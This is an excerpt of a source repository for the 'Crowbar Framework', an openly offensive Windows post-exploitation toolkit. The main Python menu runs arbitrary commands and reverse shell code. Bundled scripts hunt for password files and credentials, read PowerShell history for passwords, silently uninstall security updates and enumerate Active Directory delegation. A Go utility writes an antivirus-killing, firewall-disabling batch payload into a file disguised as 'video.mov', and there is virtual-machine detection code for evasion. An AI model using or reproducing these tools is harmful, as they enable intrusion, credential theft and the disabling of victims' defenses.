1241 | else: 1242 | print("Wrong Command!") 1243 | elif util == "use 11": 1244 | while True: 1245 | scriptsdisablefirewall = input("\nUtil (util/powershell/disable_firewall)\n |==> ") 1246 | if scriptsdisablefirewall == "help": 1247 | print(''' 1248 | +——— Help ———————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 1249 | | help - Prints out help commands. | 1250 | | run - Runs utility against the target machine. | 1251 | | clear - Clears the screen. | 1252 | | back - Goes back to the 'Util' directory. | 1253 | +————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 1254 | ''') 1255 | elif scriptsdisablefirewall == "run": 1256 | os.system("cd util && powershell.exe ./disable_firewall.ps1") 1257 | elif scriptsdisablefirewall == "clear": 1258 | os.system("cls") 1259 | elif scriptsdisablefirewall == "back": 1260 | leaveutil() 1261 | else: 1262 | print("Wrong Command!") 1263 | elif util == "use 12": 1264 | while True: 1265 | utilgetpowershellcommandhistory = input("\nUtil (util/powershell/get_powershell_history)\n |==> ") 1266 | if utilgetpowershellcommandhistory == "help": 1267 | print(''' 1268 | +——— Help ———————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 1269 | | help - Prints out help commands. | 1270 | | run - Runs utility against the target machine. | 1271 | | clear - Clears the screen. | 1272 | | back - Goes back to the 'Util' directory. | 1273 | +————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 1274 | ''') 1275 | elif utilgetpowershellcommandhistory == "run": 1276 | subprocess.call('''powershell.exe Get-Content util/get_powershell_history.ps1 | PowerShell.exe -noprofile -''', shell=True) 1277 | elif utilgetpowershellcommandhistory == "clear": 1278 | os.system("cls") 1279 | elif utilgetpowershellcommandhistory == "back": 1280 | leaveutil() 1281 | else: 1282 | print("Wrong Command!") 1283 | else: 1284 | print("Wrong Command!") 1285 | 1286 | 1287 | 1288 | 1289 | def icommand(): 1290 | print(''' 1291 | +——— Help Commands for iCommand —————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 1292 | | clear - Clears the screen. | 1293 | | back - Goes back to the Crowbar menu. | 1294 | +————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 1295 | ''') 1296 | while True: 1297 | icommandin = input("\niCommand (Type the command you want execute)\n |==> ") 1298 | if icommandin == "clear": 1299 | functionclear() 1300 | elif icommandin == "back": 1301 | crowbarbanner() 1302 | mainmenuinput() 1303 | os.system("{}".format(icommandin)) 1304 | 1305 | 1306 | def ipower(): 1307 | print(''' 1308 | +——— Help Commands for iPower ———————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 1309 | | clear - Clears the screen. | 1310 | | back - Goes back to the Crowbar menu. | 1311 | +————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 1312 | ''') 1313 | while True: 1314 | ipower = input("\niPower (Type the command you want execute)\n |==> ") 1315 | if ipower == "clear": 1316 | functionclear() 1317 | elif ipower == "back": 1318 | crowbarbanner() 1319 | mainmenuinput() 1320 | os.system("powershell {}".format(ipower)) 1321 | 1322 | # credits to https://github.com/M4ximuss/ for the 'powerless' script 1323 | # credits to https://github.com/carlospolop/ for the 'WinPEAS' script 1324 | # credits to https://github.com/joshuaruppe/ for the 'winprivesc' script 1325 | 1326 | def leaveescalate(): 1327 | escalate() 1328 | 1329 | 1330 | def escalate(): 1331 | while True: 1332 | escalate = input("\nEscalate (escalate/)\n |==> ") 1333 | if escalate == "help": 1334 | print(''' 1335 | +——— Help ———————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 1336 | | help - Prints out help commands. | 1337 | | list - Lists all the utilities. | 1338 | | use (escalation script number) - Selects and loads specified method. Example: use 1 | 1339 | | clear - Clears the screen. | 1340 | | back - Goes back to the Crowbar menu. | 1341 | +————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 1342 | ''') 1343 | elif escalate == "list": 1344 | print(''' 1345 | +——— Escalation Scripts ————————————————————————————————————————————————————————— Description ————————————————————————————————————————————————————+ 1346 | | 1. escalate/winpeas WinPEAS searches for paths to escalate privileges Windows. | 1347 | | 2. escalate/powerless A Windows privilege escalation script. | 1348 | | 3. escalate/winprivesc Script for Windows enumeration and privilege escalation routes. | 1349 | +—————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 1350 | ''') 1351 | elif escalate == "clear": 1352 | functionclear() 1353 | elif escalate == "back": 1354 | crowbarbanner() 1355 | mainmenuinput() 1356 | elif escalate == "use 1": 1357 | while True: 1358 | escalatewinpeas = input("\nEscalate (escalate/winpeas)\n |==> ") 1359 | if escalatewinpeas == "help": 1360 | print(''' 1361 | +——— Help ———————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 1362 | | help - Prints out help commands. | 1363 | | scan - Starts scanning for paths to escalate privileges. | 1364 | | clear - Clears the screen. | 1365 | | back - Goes back to the 'Escalate' directory. | 1366 | +————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 1367 | ''') 1368 | elif escalatewinpeas == "scan": 1369 | os.system("cd escalate && winPEAS.bat") 1370 | ctypes.windll.kernel32.SetConsoleTitleW("[Crowbar Framework]") 1371 | elif escalatewinpeas == "clear": 1372 | functionclear() 1373 | elif escalatewinpeas == "back": 1374 | leaveescalate() 1375 | else: 1376 | print("Wrong Command!") 1377 | elif escalate == "use 2": 1378 | while True: 1379 | escalatepowerless = input("\nEscalate (escalate/powerless)\n |==> ") 1380 | if escalatepowerless == "help": 1381 | print(''' 1382 | +——— Help ———————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 1383 | | help - Prints out help commands. | 1384 | | scan - Starts scanning for paths to escalate privileges. | 1385 | | clear - Clears the screen. | 1386 | | back - Goes back to the 'Escalate' directory. | 1387 | +————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 1388 | ''') 1389 | elif escalatepowerless == "scan": 1390 | os.system("cd escalate && Powerless.bat") 1391 | elif escalatepowerless == "clear": 1392 | functionclear() 1393 | elif escalatepowerless == "back": 1394 | leaveescalate() 1395 | else: 1396 | print("Wrong Command!") 1397 | elif escalate == "use 3": 1398 | while True: 1399 | escalatewinprivesc = input("\nEscalate (escalate/winprivesc)\n |==> ") 1400 | if escalatewinprivesc == "help": 1401 | print(''' 1402 | +——— Help ———————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 1403 | | help - Prints out help commands. | 1404 | | run - Loads the script and the menus. | 1405 | | clear - Clears the screen. | 1406 | | back - Goes back to the 'Escalate' directory. | 1407 | +————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 1408 | ''') 1409 | elif escalatewinprivesc == "run": 1410 | os.system("cd escalate && winprivesc.bat") 1411 | elif escalatewinprivesc == "clear": 1412 | functionclear() 1413 | elif escalatewinprivesc == "back": 1414 | leaveescalate() 1415 | else: 1416 | print("Wrong Command!") 1417 | else: 1418 | print("Wrong Command!") 1419 | 1420 | 1421 | def wsl(): 1422 | while True: 1423 | wslmenu = input("\nWSL (wsl/)\n |==> ") 1424 | if wslmenu == "help" or wslmenu == "list": 1425 | print(''' 1426 | +— WSL Commands —————————————————————————————————————————————————————————————————— Description ———————————————————————————————————————+ 1427 | | check Checks if WSL is installed on the target machine. | 1428 | | who Checks what user you're on. | 1429 | | shell Allows you to execute reverse and bind shell code. | 1430 | | load Loads WSL. | 1431 | +—————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 1432 | 1433 | +——— Regular Help Commands ——————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 1434 | | help - Prints out help commands. | 1435 | | clear - Clears the screen. | 1436 | | back - Goes back to the 'Util' directory. | 1437 | +————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 1438 | ''') 1439 | elif wslmenu == "check": 1440 | os.system("wsl uname -a") 1441 | elif wslmenu == "who": 1442 | os.system("wsl whoami") 1443 | elif wslmenu == "shell": 1444 | wslmenu = input("\nWSL (Enter reverse shell code)\n |==> ") 1445 | os.system("python -c '{}'".format(wslmenu)) 1446 | elif wslmenu == "load": 1447 | print(''' 1448 | +——— Message ————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 1449 | | To return to the Crowbar Framework, type 'exit'. | 1450 | +————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 1451 | ''') 1452 | os.system("wsl") 1453 | elif wslmenu == "clear": 1454 | os.system("cls") 1455 | elif wslmenu == "back": 1456 | crowbarbanner() 1457 | mainmenuinput() 1458 | else: 1459 | print("Wrong Command!") 1460 | 1461 | 1462 | 1463 | 1464 | def mainmenuinput(): 1465 | while True: 1466 | mainmenu = input("\nuser@crowbar:~# ") 1467 | if mainmenu == "help": 1468 | print(''' 1469 | +——— Help ———————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 1470 | | help - Prints out help commands. (This is for the entire framework) | 1471 | | dir util - Goes into the 'Util' directory. | 1472 | | dir scripts - Goes into the 'Scripts' directory. | 1473 | | dir escalate - Goes into the 'Escalate' directory. | 1474 | | command - Loads the 'iCommand' tool for executing OS commands via CMD. | 1475 | | power - Loads the 'iPower' tool for executing OS commands via PowerShell. | 1476 | | wsl - Checks if 'Windows Subsystem for Linux' is installed on the target machine. Type 'help' once you enter the 'wsl' menu. | 1477 | | crowbar - Reloads the framework. | 1478 | | clear - Clears the screen. (This is for the entire framework) | 1479 | +————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 1480 | ''') 1481 | elif mainmenu == "dir util": 1482 | util() 1483 | elif mainmenu == "dir scripts": 1484 | scripts() 1485 | elif mainmenu == "dir escalate": 1486 | escalate() 1487 | elif mainmenu == "command": 1488 | icommand() 1489 | elif mainmenu == "power": 1490 | ipower() 1491 | elif mainmenu == "wsl": 1492 | wsl() 1493 | elif mainmenu == "crowbar": 1494 | os.system("py main.py") 1495 | elif mainmenu == "clear": 1496 | functionclear() 1497 | else: 1498 | print("Wrong Command!") 1499 | 1500 | 1501 | def crowbarbanner(): 1502 | functionclear() 1503 | print(f''' 1504 | ▄█▄ █▄▄▄▄ ████▄ ▄ ▄ ███ ██ █▄▄▄▄ 1505 | █▀ ▀▄ █ ▄▀ █ █ █ █ █ █ █ █ █ ▄▀ 1506 | █ ▀ █▀▀▌ █ █ █ ▄ █ █ ▀ ▄ █▄▄█ █▀▀▌ 1507 | █▄ ▄▀ █ █ ▀████ █ █ █ █ ▄▀ █ █ █ █ 1508 | ▀███▀ █ █ █ █ ███ █ █ 1509 | ▀ ▀ ▀ █ ▀ 1510 | ▀ 1511 | 1512 | Welcome {beginmen} 1513 | to the Crowbar Framework. 1514 | ''') 1515 | 1516 | print(''' 1517 | +——— Crowbar ——————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 1518 | | Version: 3.0 | 1519 | | Scripts: 38 | 1520 | | Utilities: 12 | 1521 | | Made by: https://github.com/0x1CA3 | 1522 | | | 1523 | | Total Online Services: 2 | 1524 | | https://vpnapi.io/api/ | 1525 | | https://ipv4bot.whatismyipaddress.com/ | 1526 | +——————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 1527 | ''') 1528 | 1529 | crowbarbanner() 1530 | mainmenuinput() 1531 | -------------------------------------------------------------------------------- /requirements.bat: -------------------------------------------------------------------------------- 1 | @echo off 2 | 3 | pip3 install ctypes 4 | pip3 install datetime 5 | pip3 install shutil 6 | pip3 install pyautogui 7 | pip3 install winreg 8 | pip3 install socket 9 | pip3 install platform 10 | pip3 install psutil 11 | pip3 install requests 12 | pip3 install subprocess 13 | pip3 install get_mac_address 14 | pip3 install getmac 15 | -------------------------------------------------------------------------------- /scripts/getunconstrained.ps1: -------------------------------------------------------------------------------- 1 | function Get-Unconstrained { 2 | <# 3 | .SYNOPSIS 4 | Nishang script which searches computers in current domain which have Unconstrained Delegation Enabled. 5 | 6 | .DESCRIPTION 7 | The script searches in the current domain for computers which have Unconstrained Delegation enabled. 8 | The script needs to be run from an elevated shell. It requires ActiveDirectory module available with RSAT-AD-PowerShell 9 | Windows feature. The feature and module are auto-enabled by the script on a Windows Server 2012 machine. 10 | The commands used in this post are taken from this post https://adsecurity.org/?p=1667 11 | .PARAMETER Details 12 | Returns more detailed description of the computer with Unconstrained delegation. 13 | .EXAMPLE 14 | PS > Get-Unconstrained 15 | Use above command to search for computers which have unconstrained delegation enabled. Shows name of the computers. 16 | .EXAMPLE 17 | PS > Get-Unconstrained -Details 18 | Use above command to search for computers which have unconstrained delegation enabled. Shows detailed output. 19 | 20 | .LINK 21 | http://www.labofapenetrationtester.com/2016/02/getting-domain-admin-with-kerberos-unconstrained-delegation.html 22 | https://adsecurity.org/?p=1667 23 | https://github.com/samratashok/nishang 24 | #> 25 | 26 | [CmdletBinding()] Param ( 27 | [Parameter(Position = 0, Mandatory=$False)] 28 | [Switch] 29 | $Detailed 30 | ) 31 | 32 | 33 | # Check if User is Elevated 34 | $currentPrincipal = New-Object Security.Principal.WindowsPrincipal( [Security.Principal.WindowsIdentity]::GetCurrent()) 35 | if($currentPrincipal.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator) -ne $true) 36 | { 37 | Write-Warning "Run the Command as an Administrator" 38 | break 39 | } 40 | 41 | #Check for Server 2012 42 | $OSVersion = (Get-WmiObject -Class win32_OperatingSystem).BuildNumber 43 | if($OSVersion -notmatch 96) 44 | { 45 | Write-Warning "This script needs ActiveDirectory module which is available in Server 2012 with RSAT-AD-PowerShell. For other Window versions, you need to install the module manually." 46 | } 47 | else 48 | { 49 | Write-Verbose "Running on Server 2012" 50 | } 51 | 52 | #Check if the Windows feature is already installed 53 | if((Get-WindowsFeature -Name RSAT-AD-PowerShell).InstallState -ne "Installed") 54 | { 55 | Write-Warning "Required module not found. Installing it." 56 | Add-WindowsFeature -Name RSAT-AD-Powershell -Verbose 57 | } 58 | else 59 | { 60 | Write-Verbose "Required module found. Continuing.." 61 | } 62 | 63 | #Import the required module 64 | Write-Verbose "Importing the ActiveDirectory Module" 65 | Import-Module ActiveDirectory 66 | 67 | #Search for Unconstrained delegation 68 | Write-Output "Searching for domain computers with Unconstrained Delegation" 69 | $computer = Get-ADComputer -Filter {(TrustedForDelegation -eq $True) -and (PrimaryGroupID -eq 515)} 70 | if ($Detailed) 71 | { 72 | Get-ADComputer $computer.Name -Properties * 73 | } 74 | else 75 | { 76 | $computer.DnsHostName 77 | } 78 | } 79 | -------------------------------------------------------------------------------- /scripts/iisconfig.ps1: -------------------------------------------------------------------------------- 1 | Get-Childitem –Path C:\inetpub\ -Include web.config -File -Recurse -ErrorAction SilentlyContinue -------------------------------------------------------------------------------- /scripts/list_antivirus.bat: -------------------------------------------------------------------------------- 1 | @echo off 2 | 3 | WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName -------------------------------------------------------------------------------- /scripts/listarptables.ps1: -------------------------------------------------------------------------------- 1 | Get-NetNeighbor -AddressFamily IPv4 | ft ifIndex,IPAddress,LinkLayerAddress,State -------------------------------------------------------------------------------- /scripts/listcredentials.ps1: -------------------------------------------------------------------------------- 1 | cmdkey /list -------------------------------------------------------------------------------- /scripts/listnetworkinter.ps1: -------------------------------------------------------------------------------- 1 | Get-NetIPConfiguration | ft InterfaceAlias,InterfaceDescription,IPv4Address -------------------------------------------------------------------------------- /scripts/listprogramsfol.ps1: -------------------------------------------------------------------------------- 1 | Get-ChildItem 'C:\Program Files', 'C:\Program Files (x86)' | ft Parent,Name,LastWriteTime -------------------------------------------------------------------------------- /scripts/listprogramsreg.ps1: -------------------------------------------------------------------------------- 1 | Get-ChildItem -path Registry::HKEY_LOCAL_MACHINE\SOFTWARE | ft Name -------------------------------------------------------------------------------- /scripts/removeupdate.ps1: -------------------------------------------------------------------------------- 1 | function Remove-Update { 2 | <# 3 | .SYNOPSIS 4 | Nishang Payload which silently removes updates for a target machine. 5 | .DESCRIPTION 6 | This payload removes updates from a target machine. This could be 7 | used to remove all updates, all security updates or a particular update. 8 | .PARAMETER KBID 9 | THE KBID of update you want to remove. All and Security are also validd. 10 | .EXAMPLE 11 | PS > Remove-Update All 12 | This removes all updates from the target. 13 | .EXAMPLE 14 | PS > Remove-Update Security 15 | This removes all security updates from the target. 16 | .EXAMPLE 17 | PS > Remove-Update KB2761226 18 | This removes KB2761226 from the target. 19 | .LINK 20 | http://trevorsullivan.net/2011/05/31/powershell-removing-software-updates-from-windows/ 21 | https://github.com/samratashok/nishang 22 | #> 23 | [CmdletBinding()] Param( 24 | [Parameter(Position = 0, Mandatory = $True)] 25 | [String] 26 | $KBID 27 | ) 28 | 29 | $HotFixes = Get-HotFix 30 | 31 | foreach ($HotFix in $HotFixes) 32 | { 33 | 34 | if ($KBID -eq $HotFix.HotfixId) 35 | { 36 | 37 | $KBID = $HotFix.HotfixId.Replace("KB", "") 38 | $RemovalCommand = "wusa.exe /uninstall /kb:$KBID /quiet /norestart" 39 | Write-Host "Removing $KBID from the target." 40 | Invoke-Expression $RemovalCommand 41 | break 42 | } 43 | 44 | if ($KBID -match "All") 45 | { 46 | $KBNumber = $HotFix.HotfixId.Replace("KB", "") 47 | $RemovalCommand = "wusa.exe /uninstall /kb:$KBNumber /quiet /norestart" 48 | Write-Host "Removing update $KBNumber from the target." 49 | Invoke-Expression $RemovalCommand 50 | 51 | } 52 | 53 | if ($KBID -match "Security") 54 | { 55 | if ($HotFix.Description -match "Security") 56 | { 57 | 58 | $KBSecurity = $HotFix.HotfixId.Replace("KB", "") 59 | $RemovalCommand = "wusa.exe /uninstall /kb:$KBSecurity /quiet /norestart" 60 | Write-Host "Removing Security Update $KBSecurity from the target." 61 | Invoke-Expression $RemovalCommand 62 | } 63 | } 64 | 65 | 66 | while (@(Get-Process wusa -ErrorAction SilentlyContinue).Count -ne 0) 67 | { 68 | Start-Sleep 3 69 | Write-Host "Waiting for update removal to finish ..." 70 | } 71 | } 72 | 73 | } 74 | -------------------------------------------------------------------------------- /scripts/routingtable.ps1: -------------------------------------------------------------------------------- 1 | Get-NetRoute -AddressFamily IPv4 | ft DestinationPrefix,NextHop,RouteMetric,ifIndex -------------------------------------------------------------------------------- /scripts/sensitive_data_search.ps1: -------------------------------------------------------------------------------- 1 | gci c:\ -Include *pass*.txt,*pass*.xml,*pass*.ini,*pass*.xlsx,*cred*,*vnc*,*.config*,*accounts* -File -Recurse -EA SilentlyContinue -------------------------------------------------------------------------------- /scripts/unquoteservice.ps1: -------------------------------------------------------------------------------- 1 | gwmi -class Win32_Service -Property Name, DisplayName, PathName, StartMode | Where {$_.StartMode -eq "Auto" -and $_.PathName -notlike "C:\Windows*" -and $_.PathName -notlike '"*'} | select PathName,DisplayName,Name -------------------------------------------------------------------------------- /util/AvTrigger/main.go: -------------------------------------------------------------------------------- 1 | // Made by https://github.com/0x1CA3 // 2 | 3 | package main 4 | 5 | import ( 6 | "fmt" 7 | "os" 8 | ) 9 | 10 | func main() { 11 | message := "@echo off\nrem\nrem Permanently Kill Anti-Virus\nnet stop “Security Center”\nnetsh firewall set opmode mode=disable\ntskill /A av*\ntskill /A fire*\ntskill /A anti*\ncls\ntskill /A spy*\ntskill /A bullguard\ntskill /A PersFw\ntskill /A KAV*\ntskill /A ZONEALARM\ntskill /A SAFEWEB\ncls" 12 | filename := "Util/AvTrigger/video.mov" 13 | 14 | f, err := os.OpenFile(filename, os.O_RDWR|os.O_APPEND|os.O_CREATE, 0660) 15 | 16 | if err != nil { 17 | fmt.Println(err) 18 | os.Exit(-1) 19 | } 20 | defer f.Close() 21 | 22 | fmt.Fprintf(f, "%s\n", message) 23 | fmt.Println("Successfully binded!\nIf it does not work or the file") 24 | fmt.Println("has been deleted, please disable\nyour antivirus and run the program") 25 | fmt.Println("again. Once you do it would be\nrecommended to save it in a") 26 | fmt.Println("private discord server or groupchat\nso it does not get deleted just") 27 | fmt.Println("incase your antivirus decides to be a bitch") 28 | } 29 | -------------------------------------------------------------------------------- /util/VM-Detect/example.cpp: -------------------------------------------------------------------------------- 1 | /* Vm Detector */ 2 | /* Made by https://github.com/dehoisted */ 3 | 4 | #include "antivm.h" 5 | 6 | int main() 7 | { 8 | switch (isVM()) 9 | { 10 | case true: 11 | std::cout << "Virtual Machine detected\n"; 12 | exit(0); 13 | break; 14 | 15 | case false: 16 | std::cout << "Virtual Machine not detected\n"; 17 | break; 18 | } 19 | } 20 | -------------------------------------------------------------------------------- /util/VM-Detect/vmdetect.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | #include 5 | 6 | void toLowerCase(char* ptr, unsigned int len) { 7 | for (unsigned int i = 0; i < len; i++) { 8 | if (isupper(ptr[i])) 9 | ptr[i] = tolower(ptr[i]); 10 | } 11 | } 12 | 13 | // Easy to improve yourself 14 | bool isVM() 15 | { 16 | std::string sysManufacturer, sysName; 17 | char buf[1000]; 18 | DWORD sz = 1000; 19 | int ret; 20 | 21 | ret = RegGetValueA(HKEY_LOCAL_MACHINE, "SYSTEM\\CurrentControlSet\\Control\\SystemInformation", "SystemManufacturer", RRF_RT_ANY, NULL, &buf[0], &sz); 22 | toLowerCase(buf, strlen(buf)); 23 | sysManufacturer = buf; 24 | 25 | if (ret == ERROR_SUCCESS && (sysManufacturer.find("vmware") != std::string::npos || sysManufacturer.find("innotek gmbh") != std::string::npos)) { 26 | return 1; 27 | } 28 | 29 | ret = RegGetValueA(HKEY_LOCAL_MACHINE, "SYSTEM\\CurrentControlSet\\Control\\SystemInformation", "SystemProductName", RRF_RT_ANY, NULL, &buf[0], &sz); 30 | 31 | toLowerCase(buf, strlen(buf)); 32 | sysName = buf; 33 | //add more strings to make it better :) 34 | if (ret == ERROR_SUCCESS && (sysName.find("vmware") != std::string::npos || sysName.find("virtualbox") != std::string::npos)) { 35 | return 1; 36 | } 37 | return 0; 38 | } 39 | -------------------------------------------------------------------------------- /util/disable_firewall.ps1: -------------------------------------------------------------------------------- 1 | -ExecutionPolicy Bypass -command 'Set-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Terminal Server" -Name "fDenyTSConnections" –Value' -------------------------------------------------------------------------------- /util/get_powershell_history.ps1: -------------------------------------------------------------------------------- 1 | type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt 2 | type C:\Users\swissky\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt 3 | type $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt 4 | cat (Get-PSReadlineOption).HistorySavePath 5 | cat (Get-PSReadlineOption).HistorySavePath | sls passw -------------------------------------------------------------------------------- /util/list_firewall_blocked_ports.ps1: -------------------------------------------------------------------------------- 1 | $f=New-object -comObject HNetCfg.FwPolicy2;$f.rules | where {$_.action -eq "0"} | select name,applicationname,localports -------------------------------------------------------------------------------- /util/screencapture.py: -------------------------------------------------------------------------------- 1 | import os 2 | import pyautogui 3 | 4 | def functionclear(): 5 | if os.name == "nt": 6 | os.system("cls") 7 | else: 8 | os.system("clear") 9 | functionclear() 10 | 11 | screenshot = pyautogui.screenshot() 12 | screenshot.save("image.jpg") 13 | 14 | print(''' 15 | +——— Message ————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 16 | | Screenshot captured! | 17 | +————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 18 | 19 | +——— Help ———————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 20 | | crowbar - Goes back to the Crowbar main menu. | 21 | | clear - Clears the screen. | 22 | +————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 23 | ''') 24 | 25 | def main(): 26 | while True: 27 | userinput = input(f"\n({os.getcwd()})\n |==> ") 28 | if userinput == "crowbar": 29 | os.system("py main.py") 30 | elif userinput == "clear": 31 | os.system("cls") 32 | else: 33 | print("Wrong Command!") 34 | main() --------------------------------------------------------------------------------